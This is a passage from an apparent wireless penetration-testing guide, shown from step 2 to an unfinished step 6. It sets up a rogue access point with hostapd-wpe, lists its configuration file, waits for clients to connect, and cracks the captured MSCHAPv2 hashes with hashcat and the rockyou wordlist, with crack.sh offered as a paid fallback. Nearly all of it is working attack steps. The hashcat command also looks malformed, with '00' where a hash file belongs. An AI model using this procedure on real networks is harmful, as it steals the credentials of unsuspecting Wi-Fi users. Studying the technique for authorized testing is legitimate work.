2. Modify the hostapd-wpe.conf file, ensuring to modify the ssid variable:
nano /etc/hostapd-wpe/hostapd-wpe.conf
#
# hostapd-wpe.conf
# Brad Antoniewicz (@brad_anton) - Foundstone
# ------------------------------------------------
#
# Configuration file for hostapd-wpe
#
# General Options - Likely to need to be changed if you're using this
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan0
# Driver - comment this out if 802.11
#driver=wired
# May have to change these depending on build location
eap_user_file=hostapd-wpe.eap_user
ca_cert=../../hostapd-wpe/certs/ca.pem
server_cert=../../hostapd-wpe/certs/server.pem
private_key=../../hostapd-wpe/certs/server.pem
private_key_passwd=whatever
dh_file=../../hostapd-wpe/certs/dh
# 802.11 Options - Uncomment all if 802.11
ssid=hostapd-wpe
hw_mode=g
channel=1
3. Kill problematic processes such as wpa_supplicant which may interfere with our access point:
sudo airmon-ng check
4. We can then run our malicious access point and wait for connections:
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
5. Upon receiving a connection we can attempt to crack the hash provided using Hashcat:
hashcat -m 5500 00 -a 0 /usr/share/wordlists/rockyou.txt
6. If you are unable to crack the hash locally then it can be submitted to crack.sh and cracked for a price:
